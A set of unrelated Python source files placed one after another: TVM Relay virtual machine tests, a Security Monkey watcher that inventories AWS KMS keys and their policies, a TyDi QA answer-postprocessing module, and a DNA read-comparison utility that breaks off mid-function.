l = cons(relay.const(i), l)
f = relay.Function([], nth(l, relay.const(i)))
mod["main"] = f
result = veval(mod)
tvm.testing.assert_allclose(result.asnumpy(), expected[i])
def test_list_update():
expected = list(range(10))
mod = relay.Module()
p = Prelude(mod)
nil = p.nil
cons = p.cons
update = p.update
l = nil()
# create zero initialized list
for i in range(len(expected)):
l = cons(relay.const(0), l)
# set value
for i, v in enumerate(expected):
l = update(l, relay.const(i), relay.const(v))
f = relay.Function([], l)
mod["main"] = f
result = veval(mod)
tvm.testing.assert_allclose(vmobj_to_list(result), np.array(expected))
def test_list_length():
expected = list(range(10))
mod = relay.Module()
p = Prelude(mod)
nil = p.nil
cons = p.cons
length = p.length
l = nil()
# create zero initialized list
for i in range(len(expected)):
l = cons(relay.const(0), l)
l = length(l)
f = relay.Function([], l)
mod["main"] = f
result = veval(mod)
tvm.testing.assert_allclose(result.asnumpy(), 10)
def test_list_map():
mod = relay.Module()
p = Prelude(mod)
x = relay.var('x', 'int32')
add_one_func = relay.Function([x], relay.const(1) + x)
nil = p.nil
cons = p.cons
map = p.map
l = cons(relay.const(2), cons(relay.const(1), nil()))
f = relay.Function([], map(add_one_func, l))
mod["main"] = f
result = veval(mod)
tvm.testing.assert_allclose(vmobj_to_list(result), np.array([3, 2]))
def test_list_foldl():
mod = relay.Module()
p = Prelude(mod)
nil = p.nil
cons = p.cons
foldl = p.foldl
x = relay.var("x")
y = relay.var("y")
rev_dup_func = relay.Function([y, x], cons(x, cons(x, y)))
l = cons(relay.const(1), cons(relay.const(2), cons(relay.const(3), nil())))
f = relay.Function([], foldl(rev_dup_func, nil(), l))
mod["main"] = f
result = veval(mod)
tvm.testing.assert_allclose(vmobj_to_list(result), np.array([3, 3, 2, 2, 1, 1]))
def test_list_foldr():
mod = relay.Module()
p = Prelude(mod)
nil = p.nil
cons = p.cons
foldr = p.foldr
x = relay.var("x")
y = relay.var("y")
identity_func = relay.Function([x, y], cons(x, y))
l = cons(relay.const(1), cons(relay.const(2), cons(relay.const(3), nil())))
f = relay.Function([], foldr(identity_func, nil(), l))
mod["main"] = f
result = veval(mod)
tvm.testing.assert_allclose(vmobj_to_list(result), np.array([1, 2, 3]))
def test_list_sum():
mod = relay.Module()
p = Prelude(mod)
nil = p.nil
cons = p.cons
sum = p.sum
l = cons(relay.const(1), cons(relay.const(2), cons(relay.const(3), nil())))
f = relay.Function([], sum(l))
mod["main"] = f
result = veval(mod)
tvm.testing.assert_allclose(result.asnumpy(), 6)
def test_list_filter():
mod = relay.Module()
p = Prelude(mod)
nil = p.nil
cons = p.cons
filter = p.filter
x = relay.var("x", 'int32')
greater_than_one = relay.Function([x], x > relay.const(1))
l = cons(relay.const(1),
cons(relay.const(3),
cons(relay.const(1),
cons(relay.const(5),
cons(relay.const(1), nil())))))
f = relay.Function([], filter(greater_than_one, l))
mod["main"] = f
result = veval(mod)
tvm.testing.assert_allclose(vmobj_to_list(result), np.array([3, 5]))
def test_closure():
x = relay.var('x', shape=())
y = relay.var('y', shape=())
f = relay.Function([x], x + y)
ff = relay.Function([y], f)
clo = ff(relay.const(1.0))
main = clo(relay.const(2.0))
res = veval(main)
tvm.testing.assert_allclose(res.asnumpy(), 3.0)
def test_add_op_scalar():
"""
test_add_op_scalar:
fn (x, y) {
return x + y;
}
"""
mod = relay.Module()
x = relay.var('x', shape=())
y = relay.var('y', shape=())
func = relay.Function([x, y], relay.op.add(x, y))
x_data = np.array(10.0, dtype='float32')
y_data = np.array(1.0, dtype='float32')
mod["main"] = func
check_result([x_data, y_data], x_data + y_data, mod=mod)
def test_add_op_tensor():
"""
test_add_op_tensor:
fn (x, y) {
return x + y;
}
"""
mod = relay.Module()
x = relay.var('x', shape=(10, 5))
y = relay.var('y', shape=(10, 5))
func = relay.Function([x, y], relay.op.add(x, y))
x_data = np.random.rand(10, 5).astype('float32')
y_data = np.random.rand(10, 5).astype('float32')
mod["main"] = func
check_result([x_data, y_data], x_data + y_data, mod=mod)
def test_add_op_broadcast():
"""
test_add_op_broadcast:
fn (x, y) {
return x + y;
}
"""
mod = relay.Module()
x = relay.var('x', shape=(10, 5))
y = relay.var('y', shape=(1, 5))
func = relay.Function([x, y], relay.op.add(x, y))
x_data = np.random.rand(10, 5).astype('float32')
y_data = np.random.rand(1, 5).astype('float32')
mod["main"] = func
check_result([x_data, y_data], x_data + y_data, mod=mod)
if __name__ == "__main__":
test_id()
test_op()
test_cond()
test_simple_if()
test_simple_call()
test_count_loop()
test_sum_loop()
test_tuple_fst()
test_tuple_second()
test_let_scalar()
test_let_tensor()
test_split()
test_split_no_fuse()
test_list_constructor()
test_let_tensor()
test_let_scalar()
test_compose()
test_list_hd()
test_list_tl_empty_list()
test_list_tl()
test_list_nth()
test_list_update()
test_list_length()
test_list_map()
test_list_foldl()
test_list_foldr()
test_list_sum()
test_list_filter()
test_closure()
test_add_op_scalar()
test_add_op_tensor()
test_add_op_broadcast()
| |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module: security_monkey.watchers.kms
:platform: Unix
.. version:: $$VERSION$$
.. moduleauthor:: Alex Cline <alex.cline@gmail.com> @alex.cline
"""
from security_monkey.decorators import record_exception
from security_monkey.decorators import iter_account_region
from security_monkey.watcher import Watcher
from security_monkey.watcher import ChangeItem
from security_monkey.constants import TROUBLE_REGIONS
from security_monkey.exceptions import BotoConnectionIssue
from security_monkey import app, ARN_PREFIX
from dateutil.tz import tzutc
import json
from botocore.exceptions import ClientError
class KMS(Watcher):
index = 'kms'
i_am_singular = 'KMS Master Key'
i_am_plural = 'KMS Master Keys'
@record_exception()
def connect_to_kms(self, **kwargs):
from security_monkey.common.sts_connect import connect
return connect(kwargs['account_name'], 'boto3.kms.client', region=kwargs['region'],
assumed_role=kwargs['assumed_role'])
def paged_wrap_aws_rate_limited_call(self, type, func, *args, **nargs):
marker = None
all_results = []
while True:
if marker is None:
response = self.wrap_aws_rate_limited_call(func, *args, **nargs)
else:
nargs["Marker"] = marker
response = self.wrap_aws_rate_limited_call(func, *args, **nargs)
all_results.extend(response.get(type))
marker = response.get("NextMarker")
if marker is None:
break
return all_results
@record_exception()
def list_keys(self, kms, **kwargs):
all_keys = self.paged_wrap_aws_rate_limited_call(
"Keys",
kms.list_keys
)
return all_keys
@record_exception()
def list_aliases(self, kms, **kwargs):
all_aliases = self.paged_wrap_aws_rate_limited_call(
"Aliases",
kms.list_aliases
)
return all_aliases
@record_exception()
def list_grants(self, kms, key_id, **kwargs):
all_grants = self.paged_wrap_aws_rate_limited_call(
"Grants",
kms.list_grants,
KeyId=key_id
)
return all_grants
@record_exception()
def describe_key(self, kms, key_id, **kwargs):
try:
response = self.wrap_aws_rate_limited_call(
kms.describe_key,
KeyId=key_id
)
except ClientError as e:
if e.response.get("Error", {}).get("Code") != "AccessDeniedException":
raise
arn = ARN_PREFIX + ":kms:{}:{}:key/{}".format(kwargs['region'],
kwargs['account_name'],
key_id)
return {
'Error': 'Unauthorized',
'Arn': arn,
"AWSAccountId": kwargs['account_name'],
'Policies': [],
'Grants': []
}
return response.get("KeyMetadata")
@record_exception()
def list_key_policies(self, kms, key_id, alias, **kwargs):
policy_names = []
if alias.startswith('alias/aws/'):
# AWS-owned KMS keys don't have a policy we can see. Setting a default here saves an API request.
app.logger.debug("{} {}({}) is an AWS supplied KMS key, overriding to [default] for policy".format(self.i_am_singular, alias, key_id))
policy_names = ['default']
else:
try:
policy_names = self.paged_wrap_aws_rate_limited_call(
"PolicyNames",
kms.list_key_policies,
KeyId=key_id
)
except ClientError as e:
raise
return policy_names
@record_exception()
def get_key_policy(self, kms, key_id, policy_name, alias, **kwargs):
policy = self.wrap_aws_rate_limited_call(
kms.get_key_policy,
KeyId=key_id,
PolicyName=policy_name
)
return json.loads(policy.get("Policy"))
@record_exception()
def get_key_rotation_status(self, kms, key_id, alias, **kwargs):
rotation_status = None
if alias.startswith('alias/aws/'):
# AWS-owned KMS keys don't have a rotation status we can see. Setting a default here saves an API request.
app.logger.debug("{} {}({}) is an AWS supplied KMS key, overriding to True for rotation state".format(self.i_am_singular, alias, key_id))
rotation_status = True
else:
rotation_status = self.wrap_aws_rate_limited_call(
kms.get_key_rotation_status,
KeyId=key_id
).get("KeyRotationEnabled")
return rotation_status
def __init__(self, accounts=None, debug=False):
super(KMS, self).__init__(accounts=accounts, debug=debug)
def slurp(self):
"""
:returns: item_list - list of KMS keys.
:returns: exception_map - A dict where the keys are a tuple containing the
location of the exception and the value is the actual exception
"""
self.prep_for_slurp()
@iter_account_region(index=self.index, accounts=self.accounts, service_name='kms')
def slurp_items(**kwargs):
item_list = []
exception_map = {}
kwargs['exception_map'] = exception_map
app.logger.debug("Checking {}/{}/{}".format(self.index,
kwargs['account_name'],
kwargs['region']))
kms = self.connect_to_kms(**kwargs)
if kms:
# First, we'll get all the keys and aliases
keys = self.list_keys(kms, **kwargs)
# If we don't have any keys, don't bother getting aliases
if keys:
app.logger.debug("Found {} {}.".format(len(keys), self.i_am_plural))
aliases = self.list_aliases(kms, **kwargs)
app.logger.debug("Found {} {} and {} Aliases.".format(len(keys), self.i_am_plural, len(aliases)))
# Then, we'll get info about each key
for key in keys:
policies = []
key_id = key.get("KeyId")
# get the key's config object and grants
config = self.describe_key(kms, key_id, **kwargs)
if config:
# filter the list of all aliases and save them with the key they're for
config[u"Aliases"] = [a.get("AliasName") for a in aliases if a.get("TargetKeyId") == key_id]
if config[u"Aliases"]:
alias = config[u"Aliases"][0]
alias = alias[len('alias/'):] # Turn alias/name into just name
else:
alias = "[No Aliases]"
name = "{alias} ({key_id})".format(alias=alias, key_id=key_id)
if config.get('Error') is None:
grants = self.list_grants(kms, key_id, **kwargs)
policy_names = self.list_key_policies(kms, key_id, alias, **kwargs)
rotation_status = self.get_key_rotation_status(kms, key_id, alias, **kwargs)
if policy_names:
for policy_name in policy_names:
policy = self.get_key_policy(kms, key_id, policy_name, alias, **kwargs)
policies.append(policy)
# Convert the datetime objects into ISO formatted strings in UTC
if config.get('CreationDate'):
config.update({ 'CreationDate': config.get('CreationDate').astimezone(tzutc()).isoformat() })
if config.get('DeletionDate'):
config.update({ 'DeletionDate': config.get('DeletionDate').astimezone(tzutc()).isoformat() })
if grants:
for grant in grants:
if grant.get("CreationDate"):
grant.update({ 'CreationDate': grant.get('CreationDate').astimezone(tzutc()).isoformat() })
config[u"Policies"] = policies
config[u"Grants"] = grants
config[u"KeyRotationEnabled"] = rotation_status
item = KMSMasterKey(region=kwargs['region'], account=kwargs['account_name'], name=name,
arn=config.get('Arn'), config=dict(config), source_watcher=self)
item_list.append(item)
return item_list, exception_map
return slurp_items()
class KMSMasterKey(ChangeItem):
def __init__(self, region=None, account=None, name=None, arn=None, config=None, source_watcher=None):
super(KMSMasterKey, self).__init__(
index=KMS.index,
region=region,
account=account,
name=name,
arn=arn,
new_config=config if config else {},
source_watcher=source_watcher)
| |
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Postprocesses outputs from a NN compute graph into well-formed answers.
This module has only light dependencies on Tensorflow (5-10 lines in
`compute_pred_dict` and `compute_predictions`).
"""
import collections
import json
from absl import logging
from language.canine.tydiqa import data
import numpy as np
import tensorflow.compat.v1 as tf
class ScoreSummary(object):
def __init__(self):
self.predicted_label = None
self.minimal_span_score = None
self.cls_token_score = None
self.answer_type_logits = None
def read_candidates_from_one_split(file_obj):
"""Read candidates from a single jsonl file."""
candidates_dict = {}
for line in file_obj:
json_dict = json.loads(line)
candidates_dict[
json_dict["example_id"]] = json_dict["passage_answer_candidates"]
return candidates_dict
def get_best_indexes(logits, n_best_size):
"""Get the n-best logits from a list."""
index_and_score = sorted(
enumerate(logits[1:], 1), key=lambda x: x[1], reverse=True)
best_indexes = []
for i in range(len(index_and_score)):
if i >= n_best_size:
break
best_indexes.append(index_and_score[i][0])
return best_indexes
# IMPROVE ME (PULL REQUESTS WELCOME): This takes more than half the runtime and
# just runs on CPU; we could speed this up by parallelizing it (or moving it to
# Apache Beam).
def compute_predictions(eval_example, candidate_beam, max_answer_length):
"""Converts an eval_example into a `ScoreSummary` object for evaluation.
This performs python post-processing (after running NN graph in tensorflow)
in order to get the best answer.
Args:
eval_example: `EvalExample` instance with features, results.
candidate_beam: see FLAGS.candidate_beam.
max_answer_length: see FLAGS.max_answer_length.
Returns:
A `ScoreSummary` or `None` if no passage prediction could be found.
"""
predictions = []
n_best_size = candidate_beam
if not eval_example.results:
return None
if len(eval_example.features) != len(eval_example.results):
logging.warning(
"ERROR: len(features)=%s, but len(results)=%d for eval_example %s",
len(eval_example.features), len(eval_example.results),
eval_example.example_id)
return None
for unique_id, result in eval_example.results.items():
if unique_id not in eval_example.features:
logging.warning("No feature found with unique_id: %s", unique_id)
return None
wp_start_offset = (
eval_example.features[unique_id]["wp_start_offset"].int64_list.value)
wp_end_offset = (
eval_example.features[unique_id]["wp_end_offset"].int64_list.value)
language_id = (
eval_example.features[unique_id]["language_id"].int64_list.value[0])
language_name = data.Language(language_id).name.lower()
start_indexes = get_best_indexes(result["start_logits"], n_best_size)
end_indexes = get_best_indexes(result["end_logits"], n_best_size)
cls_token_score = result["start_logits"][0] + result["end_logits"][0]
for start_index in start_indexes:
for end_index in end_indexes:
if end_index < start_index:
continue
# This means these are dummy tokens (like separators).
if wp_start_offset[start_index] == -1:
continue
if wp_end_offset[end_index] == -1:
continue
length = end_index - start_index + 1
if length > max_answer_length:
continue
summary = ScoreSummary()
summary.minimal_span_score = (
result["start_logits"][start_index] +
result["end_logits"][end_index])
summary.cls_token_score = cls_token_score
summary.answer_type_logits = result["answer_type_logits"]
start_offset = wp_start_offset[start_index]
end_offset = wp_end_offset[end_index] + 1
# Span logits minus the [CLS] logits seems to be close to the best.
score = summary.minimal_span_score - summary.cls_token_score
predictions.append(
(score, summary, language_name, start_offset, end_offset))
if not predictions:
logging.warning("No predictions for eval_example %s",
eval_example.example_id)
return None
score, summary, language_name, start_span, end_span = max(
predictions, key=lambda x: x[0])
minimal_span = Span(start_span, end_span)
passage_span_index = 0
for c_ind, c in enumerate(eval_example.candidates):
start = minimal_span.start_byte_offset
end = minimal_span.end_byte_offset
if c["plaintext_start_byte"] <= start and c["plaintext_end_byte"] >= end:
passage_span_index = c_ind
break
else:
logging.warning("No passage predicted for eval_example %s. Choosing first.",
eval_example.example_id)
summary.predicted_label = {
"example_id": eval_example.example_id,
"language": language_name,
"passage_answer_index": passage_span_index,
"passage_answer_score": score,
"minimal_answer": {
"start_byte_offset": minimal_span.start_byte_offset,
"end_byte_offset": minimal_span.end_byte_offset
},
"minimal_answer_score": score,
"yes_no_answer": "NONE"
}
return summary
Span = collections.namedtuple("Span", ["start_byte_offset", "end_byte_offset"])
class EvalExample(object):
"""Eval data available for a single example."""
def __init__(self, example_id, candidates):
self.example_id = example_id
self.candidates = candidates
self.results = {}
self.features = {}
# IMPROVE ME: This function and its children takes more than half the processing
# time and it's entirely outside the tf graph. We should take advantage of the
# fact that this is embarrassingly parallel and run in on many CPU threads.
# Pull requests welcome.
def compute_pred_dict(candidates_dict, dev_features, raw_results,
candidate_beam, max_answer_length):
"""Computes official answer key from raw logits.
This function joins three pieces needed for eval script for each example,
based on the unique_id:
1. Examples, which come from the original JSON definition of the dataset;
each has a unique `example_id`.
2. Features, which are the windowed sequences of wordpieces given to the
neural network graph (and may be smaller than a single passage);
each has a `unique_id`.
3. Raw results, which are the predictions coming from the execution of the
neural network graph; each has a `unique_id`.
Because of the way `unique_ids` are assigned by `CreateTFExampleFn`,
all `unique_ids` associated with an `example_id` should numerically be sorted
after that `example_id`. The `for` loop over `datum`s below takes advantage
of this in order to merge these three things together.
Finally, with all of these things available together, this function delegates
to `compute_predictions(...)` to post-process the prediction for each example
and turn it into the JSON prediction format expected by the eval script.
Args:
candidates_dict: A dictionary containing the annotations from jsonl file.
dev_features: Features loaded from tf_record file.
raw_results: Output from running tensorflow graph.
candidate_beam: see FLAGS.candidate_beam.
max_answer_length: see FLAGS.max_answer_length.
Returns:
A dictionary containing predictions.
"""
logging.info("Post-processing predictions started.")
raw_results_by_id = [(int(res["unique_id"] + 1), res) for res in raw_results]
# Cast example id to int32 for each example, similarly to the raw results.
sess = tf.Session()
all_candidates = candidates_dict.items()
example_ids = tf.to_int32(np.array([int(k) for k, _ in all_candidates
])).eval(session=sess)
examples_by_id = list(zip(example_ids, all_candidates))
if not examples_by_id:
raise ValueError("No examples candidates found.")
feature_ids = []
features = []
for f in dev_features:
feature_ids.append(f.features.feature["unique_ids"].int64_list.value[0] + 1)
features.append(f.features.feature)
feature_ids = tf.to_int32(np.array(feature_ids)).eval(session=sess)
features_by_id = list(zip(feature_ids, features))
# Join examples with features and raw results.
eval_examples = []
merged = sorted(
examples_by_id + raw_results_by_id + features_by_id,
key=lambda pair: pair[0])
# Error counters
num_failed_matches = 0
ex_count = 0
feature_count = 0
result_count = 0
# `feature_unique_id` is an example ID or an example ID with something
# appended on the end of it such that it sorts after the appropriate
# example ID (see `convert_examples_to_features`).
for feature_unique_id, datum in merged:
# if from `examples_by_id`
if isinstance(datum, tuple):
ex_count += 1
eval_examples.append(
EvalExample(example_id=datum[0], candidates=datum[1]))
# if from `features_by_id`
elif "wp_start_offset" in datum:
feature_count += 1
# Join with the example that we just appended above, by
# adding to the `EvalExample`'s `features` dict.
if not eval_examples:
logging.warning("Expected to already have example for this example id. "
"Dataset / predictions mismatch?")
num_failed_matches += 1
continue
eval_examples[-1].features[feature_unique_id] = datum
# if from `raw_results_by_id`
else:
result_count += 1
# Join with the example that we just appended above, by
# adding to the `EvalExample`'s `results` dict.
if not eval_examples:
logging.warning("Expected to already have example for this example id. "
"Dataset / predictions mismatch?")
num_failed_matches += 1
continue
eval_examples[-1].results[feature_unique_id] = datum
logging.info(" Num candidate examples found: %d", ex_count)
logging.info(" Num candidate features found: %d", feature_count)
logging.info(" Num results found: %d", result_count)
logging.info(" len(merged): %d", len(merged))
if num_failed_matches > 0:
logging.warning(" Num failed matches: %d", num_failed_matches)
# Construct prediction objects.
tydi_pred_dict = {}
for i, eval_example in enumerate(eval_examples):
if i % 10000 == 0:
logging.info(" Computing predictions for input example: %d/%d", i,
len(eval_examples))
summary = compute_predictions(eval_example, candidate_beam,
max_answer_length)
if summary is not None:
tydi_pred_dict[eval_example.example_id] = summary.predicted_label
return tydi_pred_dict
| |
from __future__ import division
from collections import defaultdict
from dark.utils import countPrint
try:
from itertools import zip_longest
except ImportError:
# zip_longest does not exist in Python 2.7 itertools. We should be able
# to get it via from six.moves import zip_longest according to
# https://pythonhosted.org/six/index.html?highlight=zip_longest but
# that doesn't work for me.
from itertools import izip_longest as zip_longest
# A list of the ambiguous values is given at
# https://en.wikipedia.org/wiki/Nucleic_acid_notation
AMBIGUOUS = {
'A': {'A'},
'C': {'C'},
'G': {'G'},
'T': {'T'},
'M': {'A', 'C'},
'R': {'A', 'G'},
'W': {'A', 'T'},
'S': {'G', 'C'},
'K': {'G', 'T'},
'Y': {'C', 'T'},
'V': {'A', 'C', 'G'},
'H': {'A', 'C', 'T'},
'D': {'A', 'G', 'T'},
'B': {'C', 'G', 'T'},
'N': {'A', 'C', 'G', 'T'},
}
# Make a reverse version of AMBIGUOUS.
BASES_TO_AMBIGUOUS = dict(
(''.join(sorted(bases)), symbol) for symbol, bases in AMBIGUOUS.items())
def matchToString(dnaMatch, read1, read2, matchAmbiguous=True, indent='',
offsets=None, includeGapLocations=True):
"""
Format a DNA match as a string.
@param dnaMatch: A C{dict} returned by C{compareDNAReads}.
@param read1: A C{Read} instance or an instance of one of its subclasses.
@param read2: A C{Read} instance or an instance of one of its subclasses.
@param matchAmbiguous: If C{True}, ambiguous nucleotides that are
possibly correct were counted as actually being correct. Otherwise,
the match was done strictly, insisting that only non-ambiguous
nucleotides could contribute to the matching nucleotide count.
@param indent: A C{str} to indent all returned lines with.
@param offsets: If not C{None}, a C{set} of offsets of interest that were
only considered when making C{match}.
@param includeGapLocations: If C{True} indicate the (1-based) locations of
gaps.
@return: A C{str} describing the match.
"""
match = dnaMatch['match']
identicalMatchCount = match['identicalMatchCount']
ambiguousMatchCount = match['ambiguousMatchCount']
gapMismatchCount = match['gapMismatchCount']
gapGapMismatchCount = match['gapGapMismatchCount']
nonGapMismatchCount = match['nonGapMismatchCount']
if offsets:
len1 = len2 = len(offsets)
else:
len1, len2 = map(len, (read1, read2))
result = []
append = result.append
append(countPrint('%sExact matches' % indent, identicalMatchCount,
len1, len2))
append(countPrint('%sAmbiguous matches' % indent, ambiguousMatchCount,
len1, len2))
if ambiguousMatchCount and identicalMatchCount:
anyMatchCount = identicalMatchCount + ambiguousMatchCount
append(countPrint('%sExact or ambiguous matches' % indent,
anyMatchCount, len1, len2))
mismatchCount = (gapMismatchCount + gapGapMismatchCount +
nonGapMismatchCount)
append(countPrint('%sMismatches' % indent, mismatchCount, len1, len2))
conflicts = 'conflicts' if matchAmbiguous else 'conflicts or ambiguities'
append(countPrint('%s Not involving gaps (i.e., %s)' % (indent,
conflicts), nonGapMismatchCount, len1, len2))
append(countPrint('%s Involving a gap in one sequence' % indent,
gapMismatchCount, len1, len2))
append(countPrint('%s Involving a gap in both sequences' % indent,
gapGapMismatchCount, len1, len2))
for read, key in zip((read1, read2), ('read1', 'read2')):
append('%s Id: %s' % (indent, read.id))
length = len(read)
append('%s Length: %d' % (indent, length))
gapCount = len(dnaMatch[key]['gapOffsets'])
append(countPrint('%s Gaps' % indent, gapCount, length))
if includeGapLocations and gapCount:
append(
'%s Gap locations (1-based): %s' %
(indent,
', '.join(map(lambda offset: str(offset + 1),
sorted(dnaMatch[key]['gapOffsets'])))))
ambiguousCount = len(dnaMatch[key]['ambiguousOffsets'])
append(countPrint('%s Ambiguous' % indent, ambiguousCount, length))
extraCount = dnaMatch[key]['extraCount']
if extraCount:
append(countPrint('%s Extra nucleotides at end' % indent,
extraCount, length))
return '\n'.join(result)
def compareDNAReads(read1, read2, matchAmbiguous=True, gapChars='-',
offsets=None):
"""
Compare two DNA sequences.
@param read1: A C{Read} instance or an instance of one of its subclasses.
@param read2: A C{Read} instance or an instance of one of its subclasses.
@param matchAmbiguous: If C{True}, count ambiguous nucleotides that are
possibly correct as actually being correct, and score these in the
ambiguousMatchCount. Otherwise, we are strict and insist that only
non-ambiguous nucleotides can contribute to the matching nucleotide
count.
@param gapChars: An object supporting __contains__ with characters that
should be considered to be gaps.
@param offsets: If not C{None}, a C{set} of offsets of interest. Offsets
not in the set will not be considered.
@return: A C{dict} with information about the match and the individual
sequences (see below).
"""
identicalMatchCount = ambiguousMatchCount = 0
gapMismatchCount = nonGapMismatchCount = gapGapMismatchCount = 0
read1ExtraCount = read2ExtraCount = 0
read1GapOffsets = []
read2GapOffsets = []
read1AmbiguousOffsets = []
read2AmbiguousOffsets = []
empty = set()
def _identicalMatch(a, b):
return a == b and len(AMBIGUOUS[a]) == 1
def _ambiguousMatch(a, b, matchAmbiguous):
"""
Checks if two characters match ambiguously if matchAmbiguous is True.
A match is an ambiguous match if it is not an identical match, but the
sets of ambiguous characters overlap.
"""
return (matchAmbiguous and
not _identicalMatch(a, b) and
AMBIGUOUS.get(a, empty) & AMBIGUOUS.get(b, empty))
for offset, (a, b) in enumerate(zip_longest(read1.sequence.upper(),
read2.sequence.upper())):
# Use 'is not None' in the following to allow an empty offsets set
# to be passed.
if offsets is not None and offset not in offsets:
continue
if len(AMBIGUOUS.get(a, '')) > 1:
read1AmbiguousOffsets.append(offset)
if len(AMBIGUOUS.get(b, '')) > 1:
read2AmbiguousOffsets.append(offset)
if a is None:
# b has an extra character at its end (it cannot be None).
assert b is not None
read2ExtraCount += 1
if b in gapChars:
read2GapOffsets.append(offset)
elif b is None:
# a has an extra character at its end.
read1ExtraCount += 1
if a in gapChars:
read1GapOffsets.append(offset)
else:
# We have a character from both sequences (they could still be
# gap characters).
if a in gapChars:
read1GapOffsets.append(offset)
if b in gapChars:
# Both are gaps. This can happen (though hopefully not
# if the sequences were pairwise aligned).
gapGapMismatchCount += 1
read2GapOffsets.append(offset)
else:
# a is a gap, b is not.
gapMismatchCount += 1
else:
if b in gapChars:
# b is a gap, a is not.
gapMismatchCount += 1
read2GapOffsets.append(offset)
else:
# Neither is a gap character.
if _identicalMatch(a, b):
identicalMatchCount += 1
elif _ambiguousMatch(a, b, matchAmbiguous):
ambiguousMatchCount += 1
else:
nonGapMismatchCount += 1
return {
'match': {
'identicalMatchCount': identicalMatchCount,
'ambiguousMatchCount': ambiguousMatchCount,
'gapMismatchCount': gapMismatchCount,
'gapGapMismatchCount': gapGapMismatchCount,
'nonGapMismatchCount': nonGapMismatchCount,
},
'read1': {
'ambiguousOffsets': read1AmbiguousOffsets,
'extraCount': read1ExtraCount,
'gapOffsets': read1GapOffsets,
},
'read2': {
'ambiguousOffsets': read2AmbiguousOffsets,
'extraCount': read2ExtraCount,
'gapOffsets': read2GapOffsets,
},
}
def findKozakConsensus(read):
"""
In a given DNA sequence, search for a Kozak consensus: (gcc)gccRccATGG.
The upper case bases in that pattern are required, and the lower case
bases are the ones most frequently found at the given positions. The
initial 'gcc' sequence (in parentheses) is of uncertain significance
and is not taken into account here.
@param read: A C{DNARead} instance to be checked for Kozak consensi.
@return: A generator that yields C{DNAKozakRead} instances.
"""
from dark.reads import DNAKozakRead
readLen = len(read)
if readLen > 9:
offset = 6
readSeq = read.sequence
while offset < readLen - 3:
triplet = readSeq[offset:offset + 3]
if triplet == 'ATG':
if readSeq[offset + 3] == 'G':
if readSeq[offset - 3] in 'GA':
kozakQualityCount = sum((
readSeq[offset - 1] == 'C',
readSeq[offset - 2] == 'C',
readSeq[offset - 4] == 'C',
readSeq[offset - 5] == 'C',
readSeq[offset - 6] == 'G'))
kozakQualityPercent = kozakQualityCount / 5.0 * 100
yield DNAKozakRead(read, offset - 6, offset + 4,
kozakQualityPercent)
offset += 1
class FloatBaseCounts(object):
"""
Hold a floating point count of possible nucleotide bases.
@param codes: An iterable of nucleotide codes.
@param unknownAreAmbiguous: If C{True}, any unknown character (e.g., a '-'
gap or '?' unknown base) will be treated as being fully ambiguous
(i.e., could be any of ACGT). Otherwise, all unknown characters are
collected under the count for '-'.
"""
def __init__(self, codes, unknownAreAmbiguous=False):
self.codes = list(map(str.upper, codes))
self.unknownAreAmbiguous = unknownAreAmbiguous
self.n = len(self.codes)
counts = defaultdict(float)
default = self._default = set('ACGT') if unknownAreAmbiguous else {'-'}
for code in self.codes:
possible = AMBIGUOUS.get(code, default)
frac = 1.0 / len(possible)
for p in possible:
counts[p] += frac
# Sort first by base.
_sorted = [(base, counts[base]) for base in sorted(counts)]
# Then by count (reversed).
def key(item):
return item[1]
self._sorted = sorted(_sorted, key=key, reverse=True)
self.counts = counts
def mostFrequent(self):
"""
Which bases are the most frequent?
@return: A C{set} of the most frequent bases.
"""
maxCount = self._sorted[0][1]
return set(base for base, count in self._sorted if count == maxCount)
def highestFrequency(self):
"""
What is the frequency of the most frequent base?
@return: The C{float} frequency of the most common base.
"""
if len(self.counts) < 2:
return 1.0
else:
return self._sorted[0][1] / float(self.n)
def homogeneous(self, level):
"""
Does the most frequent base occurs at least C{level} fraction of the
time?
@param level: A C{float} fraction.
@return: C{True} if the most common base occurs at least C{level}
fraction of the time. If there are no bases at all, this is
considered homogeneous.
"""
return self.highestFrequency() >= level
def __len__(self):
return len(self.counts)
def __str__(self):
fmt = '%d' if all(c == int(c) for b, c in self._sorted) else '%.2f'
return '%s (%.3f)' % (
' '.join(('%s:' + fmt) % (b, c) for b, c in self._sorted),
self.highestFrequency())
def variable(self, confirm=True):
"""
Are the nucleotides variable?
@param confirm: If C{True}, confirm that there is variability by
looking at the ambiguous nucleotides. Else just report C{True}
if there is more than one code (which might not indicate actual
variability, since two codes could be ambiguous and have a
nucleotide in common).
"""
codes = self.codes
if confirm:
unambiguous = set()
ambiguousIntersection = None
default = self._default
for code in codes:
possible = AMBIGUOUS.get(code, default)
if len(possible) == 1:
unambiguous.add(code)
else:
if ambiguousIntersection is None:
ambiguousIntersection = set(possible)
else:
ambiguousIntersection.intersection_update(possible)
if len(unambiguous) == 0:
# There were no unambiguous nucleotide codes.
# Sanity check: there must have been some ambiguous sites.
assert ambiguousIntersection is not None
if len(ambiguousIntersection) == 0:
# The ambiguous sites had nothing in common, so
# variation must exist (it cannot be determined what
# the variation is, but we don't care about that).
return True
else:
# All the ambiguous sites have at least one nucleotide
# in common, so we can't be sure there's any variation.
pass
elif len(unambiguous) == 1:
# All the unambiguous sites agree. Do any of the ambiguous
# sites (if any) not allow the unambiguous nucleotide in
# their possibilities?
if ambiguousIntersection is None:
# There were no ambiguous sites, so there's no
# variation here.
pass
else:
# If any of the ambiguous sites excludes the single
# unambiguous nucleotide, then variation must exist.
nt = unambiguous.pop()
for code in codes:
possible = AMBIGUOUS.get(code, default)
if nt not in possible:
return True
elif len(unambiguous) > 1:
return True
else:
if len(codes) > 1:
return True
return False
def sequenceToRegex(sequence, wildcards='-?'):
"""
Convert a potentially ambiguous DNA sequence into a regular expression.
